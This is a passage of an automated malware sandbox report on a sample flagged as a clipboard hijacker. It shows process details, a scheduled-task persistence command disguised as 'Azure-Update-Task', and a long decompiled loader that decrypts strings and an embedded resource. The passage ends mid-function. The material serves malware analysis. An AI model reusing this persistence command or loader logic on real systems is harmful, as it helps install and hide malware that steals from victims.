                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                        Imagebase:0x7ff61de10000
                                                                                                                                                                                        File size:625664 bytes
                                                                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                        Chronological Activities

                                                                                                                                                                                        Analysis Process: sihost.exe PID: 5784 Parent PID: 936

                                                                                                                                                                                        General

                                                                                                                                                                                        Start time:10:17:25
                                                                                                                                                                                        Start date:25/09/2021
                                                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exe
                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                        File size:293376 bytes
                                                                                                                                                                                        MD5 hash:D508B954A785BDB77FDEFFCD4C56F8E5
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                        • Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: 0000000E.00000003.448804837.0000000002C70000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: 0000000E.00000002.609959614.0000000002C60000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: 0000000E.00000002.609430439.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                        • Detection: 49%, ReversingLabs
                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                        Chronological Activities

                                                                                                                                                                                        Analysis Process: schtasks.exe PID: 6672 Parent PID: 5784

                                                                                                                                                                                        General

                                                                                                                                                                                        Start time:10:17:30
                                                                                                                                                                                        Start date:25/09/2021
                                                                                                                                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:/C /create /F /sc minute /mo 1 /tn 'Azure-Update-Task' /tr 'C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exe'
                                                                                                                                                                                        Imagebase:0x380000
                                                                                                                                                                                        File size:185856 bytes
                                                                                                                                                                                        MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                        Chronological Activities

                                                                                                                                                                                        Analysis Process: conhost.exe PID: 6760 Parent PID: 6672

                                                                                                                                                                                        General

                                                                                                                                                                                        Start time:10:17:31
                                                                                                                                                                                        Start date:25/09/2021
                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                        Imagebase:0x7ff61de10000
                                                                                                                                                                                        File size:625664 bytes
                                                                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                        Chronological Activities

                                                                                                                                                                                        Disassembly

                                                                                                                                                                                        Code Analysis

                                                                                                                                                                                        Reset < >

                                                                                                                                                                                          Analysis Process: eYvT1lg5Dy.exe PID: 6504 Parent PID: 3512 eYvT1lg5Dy.exeCOMMON

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          Function 004019F0, Relevance: 147.7, APIs: 34, Strings: 50, Instructions: 747comprocessCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 77%
                                                                                                                                                                                          			E004019F0(void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t337;
				void* _t340;
				int _t341;
				CHAR* _t344;
				intOrPtr* _t349;
				int _t350;
				long _t352;
				signed int _t354;
				intOrPtr _t358;
				long _t359;
				CHAR* _t364;
				struct HINSTANCE__* _t365;
				CHAR* _t366;
				_Unknown_base(*)()* _t367;
				int _t368;
				int _t369;
				int _t370;
				intOrPtr* _t376;
				int _t378;
				intOrPtr _t379;
				intOrPtr* _t381;
				int _t383;
				intOrPtr* _t384;
				int _t385;
				int _t396;
				int _t399;
				int _t402;
				int _t405;
				intOrPtr* _t407;
				int _t413;
				int _t415;
				void* _t421;
				int _t422;
				int _t424;
				intOrPtr* _t428;
				intOrPtr _t429;
				intOrPtr* _t431;
				int _t432;
				int _t435;
				intOrPtr* _t437;
				int _t438;
				intOrPtr* _t439;
				int _t440;
				int _t442;
				signed int _t448;
				signed int _t451;
				signed int _t452;
				int _t469;
				int _t471;
				int _t482;
				signed int _t486;
				intOrPtr* _t488;
				intOrPtr* _t490;
				intOrPtr* _t492;
				intOrPtr _t493;
				void* _t494;
				struct HRSRC__* _t497;
				void* _t514;
				int _t519;
				intOrPtr* _t520;
				void* _t524;
				void* _t525;
				struct HINSTANCE__* _t526;
				intOrPtr _t527;
				void* _t531;
				void* _t535;
				struct HRSRC__* _t536;
				intOrPtr* _t537;
				intOrPtr* _t539;
				int _t542;
				int _t543;
				intOrPtr* _t547;
				intOrPtr* _t548;
				intOrPtr* _t549;
				intOrPtr* _t550;
				void* _t551;
				intOrPtr _t552;
				int _t555;
				void* _t556;
				void* _t557;
				void* _t558;
				void* _t559;
				void* _t560;
				void* _t561;
				void* _t562;
				intOrPtr* _t563;
				void* _t564;
				void* _t565;
				void* _t566;
				void* _t567;

				_t567 = __eflags;
				_t494 = __edx;
				__imp__OleInitialize(0); // executed
				 *((char*)(_t556 + 0x18)) = 0xe0;
				 *((char*)(_t556 + 0x19)) = 0x3b;
				 *((char*)(_t556 + 0x1a)) = 0x8d;
				 *((char*)(_t556 + 0x1b)) = 0x2a;
				 *((char*)(_t556 + 0x1c)) = 0xa2;
				 *((char*)(_t556 + 0x1d)) = 0x2a;
				 *((char*)(_t556 + 0x1e)) = 0x2a;
				 *((char*)(_t556 + 0x1f)) = 0x41;
				 *((char*)(_t556 + 0x20)) = 0xd3;
				 *((char*)(_t556 + 0x21)) = 0x20;
				 *((char*)(_t556 + 0x22)) = 0x64;
				 *((char*)(_t556 + 0x23)) = 6;
				 *((char*)(_t556 + 0x24)) = 0x8a;
				 *((char*)(_t556 + 0x25)) = 0xf7;
				 *((char*)(_t556 + 0x26)) = 0x3d;
				 *((char*)(_t556 + 0x27)) = 0x9d;
				 *((char*)(_t556 + 0x28)) = 0xd9;
				 *((char*)(_t556 + 0x29)) = 0xee;
				 *((char*)(_t556 + 0x2a)) = 0x15;
				 *((char*)(_t556 + 0x2b)) = 0x68;
				 *((char*)(_t556 + 0x2c)) = 0xf4;
				 *((char*)(_t556 + 0x2d)) = 0x76;
				 *((char*)(_t556 + 0x2e)) = 0xb9;
				 *((char*)(_t556 + 0x2f)) = 0x34;
				 *((char*)(_t556 + 0x30)) = 0xbf;
				 *((char*)(_t556 + 0x31)) = 0x1e;
				 *((char*)(_t556 + 0x32)) = 0xe7;
				 *((char*)(_t556 + 0x33)) = 0x78;
				 *((char*)(_t556 + 0x34)) = 0x98;
				 *((char*)(_t556 + 0x35)) = 0xe9;
				 *((char*)(_t556 + 0x36)) = 0x6f;
				 *((char*)(_t556 + 0x37)) = 0xb4;
				 *((char*)(_t556 + 0x38)) = 0;
				_push(E00401650(_t556 + 0x14, _t556 + 0x114));
				_t337 = E0040B99E(0, _t494, _t524, _t535, _t567);
				_t557 = _t556 + 0xc;
				if(_t337 == 0x41b2a0) {
					L80:
					__eflags = 0;
					return 0;
				} else {
					_t340 = CreateToolhelp32Snapshot(8, GetCurrentProcessId()); // executed
					_t525 = _t340;
					 *((intOrPtr*)(_t557 + 0x280)) = 0x224;
					 *((char*)(_t557 + 0x64)) = 0xce;
					 *((char*)(_t557 + 0x65)) = 0x27;
					 *((char*)(_t557 + 0x66)) = 0x9c;
					 *((char*)(_t557 + 0x67)) = 0x1a;
					 *((char*)(_t557 + 0x68)) = 0x95;
					 *((char*)(_t557 + 0x69)) = 0x2e;
					 *((char*)(_t557 + 0x6a)) = 0x22;
					 *((char*)(_t557 + 0x6b)) = 0x57;
					 *((char*)(_t557 + 0x6c)) = 0x91;
					 *((char*)(_t557 + 0x6d)) = 0x21;
					 *((char*)(_t557 + 0x6e)) = 0x57;
					 *((char*)(_t557 + 0x6f)) = 0x3a;
					 *((char*)(_t557 + 0x70)) = 0xf8;
					 *((char*)(_t557 + 0x71)) = 0x98;
					 *((char*)(_t557 + 0x72)) = 0x5b;
					 *((char*)(_t557 + 0x73)) = 0xf4;
					 *((char*)(_t557 + 0x74)) = 0xb5;
					 *((char*)(_t557 + 0x75)) = 0x87;
					 *((char*)(_t557 + 0x76)) = 0x7b;
					 *((char*)(_t557 + 0x77)) = 0xf;
					 *((char*)(_t557 + 0x78)) = 0xf4;
					 *((char*)(_t557 + 0x79)) = 0x76;
					 *((char*)(_t557 + 0x7a)) = 0xb9;
					 *((char*)(_t557 + 0x7b)) = 0x34;
					 *((char*)(_t557 + 0x7c)) = 0xbf;
					 *((char*)(_t557 + 0x7d)) = 0x1e;
					 *((char*)(_t557 + 0x7e)) = 0xe7;
					 *((char*)(_t557 + 0x7f)) = 0x78;
					 *((char*)(_t557 + 0x80)) = 0x98;
					 *((char*)(_t557 + 0x81)) = 0xe9;
					 *((char*)(_t557 + 0x82)) = 0x6f;
					 *((char*)(_t557 + 0x83)) = 0xb4;
					 *((char*)(_t557 + 0x84)) = 0;
					 *((char*)(_t557 + 0x18)) = 0xc0;
					 *((char*)(_t557 + 0x19)) = 0x38;
					 *((char*)(_t557 + 0x1a)) = 0x8d;
					 *((char*)(_t557 + 0x1b)) = 0x1f;
					 *((char*)(_t557 + 0x1c)) = 0x8e;
					 *((char*)(_t557 + 0x1d)) = 0x30;
					 *((char*)(_t557 + 0x1e)) = 0x65;
					 *((char*)(_t557 + 0x1f)) = 0x47;
					 *((char*)(_t557 + 0x20)) = 0xd3;
					 *((char*)(_t557 + 0x21)) = 0x29;
					 *((char*)(_t557 + 0x22)) = 0x3b;
					 *((char*)(_t557 + 0x23)) = 0x56;
					 *((char*)(_t557 + 0x24)) = 0xf8;
					 *((char*)(_t557 + 0x25)) = 0x98;
					 *((char*)(_t557 + 0x26)) = 0x5b;
					 *((char*)(_t557 + 0x27)) = 0xf4;
					 *((char*)(_t557 + 0x28)) = 0xb5;
					 *((char*)(_t557 + 0x29)) = 0x87;
					 *((char*)(_t557 + 0x2a)) = 0x7b;
					 *((char*)(_t557 + 0x2b)) = 0xf;
					 *((char*)(_t557 + 0x2c)) = 0xf4;
					 *((char*)(_t557 + 0x2d)) = 0x76;
					 *((char*)(_t557 + 0x2e)) = 0xb9;
					 *((char*)(_t557 + 0x2f)) = 0x34;
					 *((char*)(_t557 + 0x30)) = 0xbf;
					 *((char*)(_t557 + 0x31)) = 0x1e;
					 *((char*)(_t557 + 0x32)) = 0xe7;
					 *((char*)(_t557 + 0x33)) = 0x78;
					 *((char*)(_t557 + 0x34)) = 0x98;
					 *((char*)(_t557 + 0x35)) = 0xe9;
					 *((char*)(_t557 + 0x36)) = 0x6f;
					 *((char*)(_t557 + 0x37)) = 0xb4;
					 *((char*)(_t557 + 0x38)) = 0;
					_t341 = Module32First(_t525, _t557 + 0x278); // executed
					if(_t341 == 0) {
						L38:
						FindCloseChangeNotification(_t525); // executed
						_t526 = GetModuleHandleA(0);
						 *((char*)(_t557 + 0x1c)) = 0xfc;
						 *((char*)(_t557 + 0x1d)) = 0xb;
						 *((char*)(_t557 + 0x1e)) = 0xff;
						 *((char*)(_t557 + 0x1f)) = 0x75;
						 *((char*)(_t557 + 0x20)) = 0xe7;
						 *((char*)(_t557 + 0x21)) = 0x44;
						 *((char*)(_t557 + 0x22)) = 0x4b;
						 *((char*)(_t557 + 0x23)) = 0x23;
						 *((char*)(_t557 + 0x24)) = 0xbf;
						 *((char*)(_t557 + 0x25)) = 0x45;
						 *((char*)(_t557 + 0x26)) = 0x3b;
						 *((char*)(_t557 + 0x27)) = 0x56;
						 *((char*)(_t557 + 0x28)) = 0xf8;
						 *((char*)(_t557 + 0x29)) = 0x98;
						 *((char*)(_t557 + 0x2a)) = 0x5b;
						 *((char*)(_t557 + 0x2b)) = 0xf4;
						 *((char*)(_t557 + 0x2c)) = 0xb5;
						 *((char*)(_t557 + 0x2d)) = 0x87;
						 *((char*)(_t557 + 0x2e)) = 0x7b;
						 *((char*)(_t557 + 0x2f)) = 0xf;
						 *((char*)(_t557 + 0x30)) = 0xf4;
						 *((char*)(_t557 + 0x31)) = 0x76;
						 *((char*)(_t557 + 0x32)) = 0xb9;
						 *((char*)(_t557 + 0x33)) = 0x34;
						 *((char*)(_t557 + 0x34)) = 0xbf;
						 *((char*)(_t557 + 0x35)) = 0x1e;
						 *((char*)(_t557 + 0x36)) = 0xe7;
						 *((char*)(_t557 + 0x37)) = 0x78;
						 *((char*)(_t557 + 0x38)) = 0x98;
						 *((char*)(_t557 + 0x39)) = 0xe9;
						 *((char*)(_t557 + 0x3a)) = 0x6f;
						 *((char*)(_t557 + 0x3b)) = 0xb4;
						 *((char*)(_t557 + 0x3c)) = 0;
						_t344 = E00401650(_t557 + 0x18, _t557 + 0x158);
						_t558 = _t557 + 8;
						_t536 = FindResourceA(_t526, _t344, 0xa);
						 *(_t558 + 0x50) = _t536;
						_t551 = LoadResource(_t526, _t536);
						 *((intOrPtr*)(_t558 + 0x44)) = LockResource(_t551);
						_t349 = E0040B84D(0, _t557 + 0x18, _t526, SizeofResource(_t526, _t536)); // executed
						_push(0x40022);
						_t537 = _t349; // executed
						_t350 = E0040AF66(0, _t526, __eflags); // executed
						_t559 = _t558 + 8;
						 *(_t559 + 0x34) = _t350;
						__eflags = _t350;
						if(_t350 == 0) {
							 *(_t559 + 0x50) = 0;
						} else {
							E0040BA30(_t526, _t350, 0, 0x40022);
							_t486 =  *(_t559 + 0x40);
							_t559 = _t559 + 0xc;
							 *(_t559 + 0x50) = _t486;
						}
						E00401300( *(_t559 + 0x50));
						_t497 =  *(_t559 + 0x48);
						_t352 = SizeofResource(_t526, _t497);
						 *(_t559 + 0x40) = _t352;
						asm("cdq");
						_t354 = _t352 + (_t497 & 0x000003ff) >> 0xa;
						__eflags = _t354;
						if(_t354 > 0) {
							_t519 =  *(_t559 + 0x3c);
							_t482 = _t537 - _t519;
							__eflags = _t482;
							 *(_t559 + 0x34) = _t519;
							 *(_t559 + 0x88) = _t482;
							 *(_t559 + 0x38) = _t354;
							do {
								_t424 =  *(_t559 + 0x34);
								_push( *(_t559 + 0x88) + _t424);
								_push(0x400);
								_push(_t424);
								E00401560(0,  *((intOrPtr*)(_t559 + 0x54)));
								 *(_t559 + 0x34) =  *(_t559 + 0x34) + 0x400;
								_t179 = _t559 + 0x38;
								 *_t179 =  *(_t559 + 0x38) - 1;
								__eflags =  *_t179;
							} while ( *_t179 != 0);
						}
						_t448 =  *(_t559 + 0x40) & 0x800003ff;
						__eflags = _t448;
						if(_t448 < 0) {
							_t448 = (_t448 - 0x00000001 | 0xfffffc00) + 1;
							__eflags = _t448;
						}
						__eflags = _t448;
						if(_t448 > 0) {
							_t421 =  *(_t559 + 0x40) - _t448;
							_push(_t421 + _t537);
							_push(_t448);
							_t422 = _t421 +  *((intOrPtr*)(_t559 + 0x44));
							__eflags = _t422;
							_push(_t422);
							E00401560(0,  *((intOrPtr*)(_t559 + 0x58)));
						}
						E0040BA30(_t526,  *(_t559 + 0x3c), 0,  *(_t559 + 0x40));
						_t560 = _t559 + 0xc;
						FreeResource(_t551);
						_t552 =  *_t537;
						 *((intOrPtr*)(_t560 + 0x94)) = _t552;
						_t358 = E0040B84D(0,  *(_t559 + 0x40), _t526, _t552); // executed
						_t561 = _t560 + 4;
						 *((intOrPtr*)(_t561 + 0x40)) = _t358;
						_t359 = SizeofResource(_t526,  *(_t560 + 0x4c));
						_t527 =  *((intOrPtr*)(_t561 + 0x38));
						_t192 = _t537 + 4; // 0x4
						E0040AC60(_t527, _t561 + 0x98, _t192, _t359);
						E0040BA30(_t527, _t537, 0,  *((intOrPtr*)(_t561 + 0x50)));
						_t528 = _t527 + 0xe;
						 *((char*)(_t561 + 0x34)) = 0xce;
						 *((char*)(_t561 + 0x35)) = 0x27;
						 *((char*)(_t561 + 0x36)) = 0x9c;
						 *((char*)(_t561 + 0x37)) = 0x1a;
						 *((char*)(_t561 + 0x38)) = 0x95;
						 *((char*)(_t561 + 0x39)) = 0x21;
						 *((char*)(_t561 + 0x3a)) = 0x2e;
						 *((char*)(_t561 + 0x3b)) = 0xd;
						 *((char*)(_t561 + 0x3c)) = 0xdb;
						 *((char*)(_t561 + 0x3d)) = 0x29;
						 *((char*)(_t561 + 0x3e)) = 0x57;
						 *((char*)(_t561 + 0x3f)) = 0x56;
						 *((char*)(_t561 + 0x40)) = 0xf8;
						 *((char*)(_t561 + 0x41)) = 0x98;
						 *((char*)(_t561 + 0x42)) = 0x5b;
						 *((char*)(_t561 + 0x43)) = 0xf4;
						 *((char*)(_t561 + 0x44)) = 0xb5;
						 *((char*)(_t561 + 0x45)) = 0x87;
						 *((char*)(_t561 + 0x46)) = 0x7b;
						 *((char*)(_t561 + 0x47)) = 0xf;
						 *((char*)(_t561 + 0x48)) = 0xf4;
						 *((char*)(_t561 + 0x49)) = 0x76;
						 *((char*)(_t561 + 0x4a)) = 0xb9;
						 *((char*)(_t561 + 0x4b)) = 0x34;
						 *((char*)(_t561 + 0x4c)) = 0xbf;
						 *((char*)(_t561 + 0x4d)) = 0x1e;
						 *((char*)(_t561 + 0x4e)) = 0xe7;
						 *((char*)(_t561 + 0x4f)) = 0x78;
						 *((char*)(_t561 + 0x50)) = 0x98;
						 *((char*)(_t561 + 0x51)) = 0xe9;
						 *((char*)(_t561 + 0x52)) = 0x6f;
						 *((char*)(_t561 + 0x53)) = 0xb4;
						 *((char*)(_t561 + 0x54)) = 0;
						_t364 = E00401650(_t561 + 0x30, _t561 + 0x110);
						_t562 = _t561 + 0x24;
						_t365 = LoadLibraryA(_t364); // executed
						_t538 = _t365;
						 *((char*)(_t562 + 0x10)) = 0xe0;
						 *((char*)(_t562 + 0x11)) = 0x18;
						 *((char*)(_t562 + 0x12)) = 0xad;
						 *((char*)(_t562 + 0x13)) = 0x36;
						 *((char*)(_t562 + 0x14)) = 0x95;
						 *((char*)(_t562 + 0x15)) = 0x21;
						_t451 = _t562 + 0x134;
						 *((char*)(_t562 + 0x1e)) = 0x2a;
						 *((char*)(_t562 + 0x1f)) = 0x57;
						 *((char*)(_t562 + 0x20)) = 0xda;
						 *((char*)(_t562 + 0x21)) = 0xc;
						 *((char*)(_t562 + 0x22)) = 0x55;
						 *((char*)(_t562 + 0x23)) = 0x25;
						 *((char*)(_t562 + 0x24)) = 0x8c;
						 *((char*)(_t562 + 0x25)) = 0xf9;
						 *((char*)(_t562 + 0x26)) = 0x35;
						 *((char*)(_t562 + 0x27)) = 0x97;
						 *((char*)(_t562 + 0x28)) = 0xd0;
						 *((char*)(_t562 + 0x29)) = 0x87;
						 *((char*)(_t562 + 0x2a)) = 0x7b;
						 *((char*)(_t562 + 0x2b)) = 0xf;
						 *((char*)(_t562 + 0x2c)) = 0xf4;
						 *((char*)(_t562 + 0x2d)) = 0x76;
						 *((char*)(_t562 + 0x2e)) = 0xb9;
						 *((char*)(_t562 + 0x2f)) = 0x34;
						 *((char*)(_t562 + 0x30)) = 0xbf;
						 *((char*)(_t562 + 0x31)) = 0x1e;
						 *((char*)(_t562 + 0x32)) = 0xe7;
						 *((char*)(_t562 + 0x33)) = 0x78;
						 *((char*)(_t562 + 0x34)) = 0x98;
						 *((char*)(_t562 + 0x35)) = 0xe9;
						 *((char*)(_t562 + 0x36)) = 0x6f;
						 *((char*)(_t562 + 0x37)) = 0xb4;
						 *((char*)(_t562 + 0x38)) = 0;
						_t366 = E00401650(_t562 + 0x14, _t451);
						_t563 = _t562 + 8;
						_t367 = GetProcAddress(_t365, _t366);
						__eflags = _t367;
						_t452 = _t451 & 0xffffff00 | _t367 != 0x00000000;
						__eflags = _t452;
						 *(_t563 + 0x47) = _t452 == 0;
						 *0x423480 = _t367;
						 *((intOrPtr*)(_t563 + 0x80)) = 0;
						 *((intOrPtr*)(_t563 + 0x84)) = 0;
						 *((intOrPtr*)(_t563 + 0x4c)) = 0;
						 *(_t563 + 0x58) = 0;
						 *(_t563 + 0x54) = 0;
						__eflags = _t452;
						if(_t452 != 0) {
							_t368 =  *_t367(0x41b230, 0x41b220, _t563 + 0x80); // executed
							__eflags = _t368;
							if(_t368 >= 0) {
								__eflags =  *(_t563 + 0x47);
								if( *(_t563 + 0x47) == 0) {
									 *((intOrPtr*)(_t563 + 0x17c)) = _t563 + 0x17c;
									E004018F0( *((intOrPtr*)(_t563 + 0x38)), _t563 + 0x17c, _t563 + 0x17c,  *((intOrPtr*)(_t563 + 0x38)), 3);
									_t376 =  *((intOrPtr*)(_t563 + 0x80));
									_t378 =  *((intOrPtr*)( *((intOrPtr*)( *_t376 + 0xc))))(_t376,  *((intOrPtr*)(_t563 + 0x178)), 0x41b240, _t563 + 0x84); // executed
									__eflags = _t378;
									if(_t378 >= 0) {
										_t381 =  *((intOrPtr*)(_t563 + 0x84));
										_t383 =  *((intOrPtr*)( *((intOrPtr*)( *_t381 + 0x24))))(_t381, 0x41b210, 0x41b290, _t563 + 0x4c); // executed
										__eflags = _t383;
										if(_t383 >= 0) {
											_t384 =  *((intOrPtr*)(_t563 + 0x4c));
											_t385 =  *((intOrPtr*)( *((intOrPtr*)( *_t384 + 0x28))))(_t384); // executed
											__eflags = _t385;
											if(_t385 >= 0) {
												 *((intOrPtr*)(_t563 + 0x38)) = 0;
												E00401870(_t563 + 0x44, _t552, "_._");
												_t539 = __imp__#8;
												 *((intOrPtr*)(_t563 + 0x40)) = 0;
												 *_t539(_t563 + 0x94);
												E00401870(_t563 + 0x3c, _t552, "___");
												 *_t539(_t563 + 0xa4);
												 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t563 + 0x4c)))) + 0x34))))( *((intOrPtr*)(_t563 + 0x50)), E004018D0(_t563 + 0x58)); // executed
												_t542 =  *(_t563 + 0x58);
												__eflags = _t542;
												if(_t542 == 0) {
													E0040AD90(0x80004003);
												}
												_t396 =  *((intOrPtr*)( *((intOrPtr*)( *_t542))))(_t542, 0x41b270, E004018D0(_t563 + 0x54));
												 *((intOrPtr*)(_t563 + 0x94)) = _t552 + 0xfffffff2;
												 *((intOrPtr*)(_t563 + 0x98)) = 0;
												__imp__#15(0x11, 1, _t563 + 0x88); // executed
												_t543 = _t396;
												 *((intOrPtr*)(_t563 + 0x50)) = 0;
												__imp__#23(_t543, _t563 + 0x48);
												E0040B350(0, _t528, _t543,  *((intOrPtr*)(_t563 + 0x48)), _t528, _t552 + 0xfffffff2);
												_t564 = _t563 + 0xc;
												__imp__#24(_t543);
												_t399 =  *(_t564 + 0x54);
												__eflags = _t399;
												if(_t399 == 0) {
													_t399 = E0040AD90(0x80004003);
												}
												 *((intOrPtr*)( *((intOrPtr*)( *_t399 + 0xb4))))(_t399, _t543, E004018D0(_t564 + 0x34)); // executed
												__eflags = _t543;
												if(_t543 != 0) {
													__imp__#16(_t543); // executed
												}
												_t402 =  *(_t564 + 0x34);
												__eflags = _t402;
												if(_t402 == 0) {
													_t402 = E0040AD90(0x80004003);
												}
												_t469 =  *(_t564 + 0x40);
												_t555 = _t402;
												__eflags = _t469;
												if(_t469 == 0) {
													_t531 = 0;
													__eflags = 0;
												} else {
													_t531 =  *_t469;
												}
												 *((intOrPtr*)( *((intOrPtr*)( *_t402 + 0x44))))(_t555, _t531, E004018D0(_t564 + 0x3c)); // executed
												__imp__#411(0xc, 0, 0);
												_t471 =  *(_t564 + 0x3c);
												__eflags = _t471;
												if(_t471 == 0) {
													E0040AD90(0x80004003);
												}
												_t405 =  *(_t564 + 0x38);
												__eflags = _t405;
												if(_t405 == 0) {
													_t514 = 0;
													__eflags = 0;
												} else {
													_t514 =  *_t405;
												}
												_t563 = _t564 - 0x10;
												_t407 = _t563;
												 *_t407 =  *((intOrPtr*)(_t564 + 0x94));
												 *((intOrPtr*)(_t407 + 4)) =  *((intOrPtr*)(_t563 + 0xb0));
												 *((intOrPtr*)(_t407 + 8)) =  *((intOrPtr*)(_t563 + 0xb8));
												_t528 =  *((intOrPtr*)(_t563 + 0xc0));
												 *((intOrPtr*)(_t407 + 0xc)) =  *((intOrPtr*)(_t563 + 0xc0));
												 *((intOrPtr*)( *((intOrPtr*)( *_t471 + 0xe4))))(_t471, _t514, 0x118, 0, 0, _t564 + 0xa4);
												_t538 = __imp__#9; // 0x75c6cf00
												_t538->i(_t563 + 0xa4);
												E004019A0(_t563 + 0x38);
												_t538->i(_t563 + 0x94);
												_t413 =  *(_t563 + 0x3c);
												__eflags = _t413;
												if(_t413 != 0) {
													 *((intOrPtr*)( *((intOrPtr*)( *_t413 + 8))))(_t413);
												}
												E004019A0(_t563 + 0x40);
												_t415 =  *(_t563 + 0x34);
												__eflags = _t415;
												if(_t415 != 0) {
													 *((intOrPtr*)( *((intOrPtr*)( *_t415 + 8))))(_t415);
												}
											}
										}
									}
									_t379 =  *((intOrPtr*)(_t563 + 0x174));
									__eflags = _t379 - _t563 + 0x178;
									if(__eflags != 0) {
										_push(_t379);
										E0040B6B5(0, _t528, _t538, __eflags);
										_t563 = _t563 + 4;
									}
								}
							}
							_t369 =  *(_t563 + 0x54);
							__eflags = _t369;
							if(_t369 != 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t369 + 8))))(_t369);
							}
							_t370 =  *(_t563 + 0x58);
							__eflags = _t370;
							if(_t370 != 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t370 + 8))))(_t370);
							}
						}
						goto L80;
					} else {
						_t428 = E00401650(_t557 + 0x60, _t557 + 0xd4);
						_t565 = _t557 + 8;
						_t547 = _t428;
						_t520 = _t565 + 0x298;
						while(1) {
							_t429 =  *_t520;
							if(_t429 !=  *_t547) {
								break;
							}
							if(_t429 == 0) {
								L7:
								_t429 = 0;
							} else {
								_t493 =  *((intOrPtr*)(_t520 + 1));
								if(_t493 !=  *((intOrPtr*)(_t547 + 1))) {
									break;
								} else {
									_t520 = _t520 + 2;
									_t547 = _t547 + 2;
									if(_t493 != 0) {
										continue;
									} else {
										goto L7;
									}
								}
							}
							L9:
							if(_t429 != 0) {
								_t431 = E00401650(_t565 + 0x14, _t565 + 0xb4);
								_t557 = _t565 + 8;
								_t548 = _t431;
								_t488 = _t557 + 0x298;
								while(1) {
									_t432 =  *_t488;
									__eflags = _t432 -  *_t548;
									if(_t432 !=  *_t548) {
										break;
									}
									__eflags = _t432;
									if(_t432 == 0) {
										L16:
										_t432 = 0;
									} else {
										_t432 =  *((intOrPtr*)(_t488 + 1));
										__eflags = _t432 -  *((intOrPtr*)(_t548 + 1));
										if(_t432 !=  *((intOrPtr*)(_t548 + 1))) {
											break;
										} else {
											_t488 = _t488 + 2;
											_t548 = _t548 + 2;
											__eflags = _t432;
											if(_t432 != 0) {
												continue;
											} else {
												goto L16;
											}
										}
									}
									L18:
									__eflags = _t432;
									if(_t432 == 0) {
										goto L10;
									} else {
										_t435 = Module32Next(_t525, _t557 + 0x278);
										__eflags = _t435;
										if(_t435 != 0) {
											do {
												_t437 = E00401650(_t557 + 0x60, _t557 + 0xd4);
												_t566 = _t557 + 8;
												_t549 = _t437;
												_t490 = _t566 + 0x298;
												while(1) {
													_t438 =  *_t490;
													__eflags = _t438 -  *_t549;
													if(_t438 !=  *_t549) {
														break;
													}
													__eflags = _t438;
													if(_t438 == 0) {
														L26:
														_t438 = 0;
													} else {
														_t438 =  *((intOrPtr*)(_t490 + 1));
														__eflags = _t438 -  *((intOrPtr*)(_t549 + 1));
														if(_t438 !=  *((intOrPtr*)(_t549 + 1))) {
															break;
														} else {
															_t490 = _t490 + 2;
															_t549 = _t549 + 2;
															__eflags = _t438;
															if(_t438 != 0) {
																continue;
															} else {
																goto L26;
															}
														}
													}
													L28:
													__eflags = _t438;
													if(_t438 == 0) {
														goto L10;
													} else {
														_t439 = E00401650(_t566 + 0x14, _t566 + 0xb4);
														_t557 = _t566 + 8;
														_t550 = _t439;
														_t492 = _t557 + 0x298;
														while(1) {
															_t440 =  *_t492;
															__eflags = _t440 -  *_t550;
															if(_t440 !=  *_t550) {
																break;
															}
															__eflags = _t440;
															if(_t440 == 0) {
																L34:
																_t440 = 0;
															} else {
																_t440 =  *((intOrPtr*)(_t492 + 1));
																__eflags = _t440 -  *((intOrPtr*)(_t550 + 1));
																if(_t440 !=  *((intOrPtr*)(_t550 + 1))) {
																	break;
																} else {
																	_t492 = _t492 + 2;
																	_t550 = _t550 + 2;
																	__eflags = _t440;
																	if(_t440 != 0) {
																		continue;
																	} else {
																		goto L34;
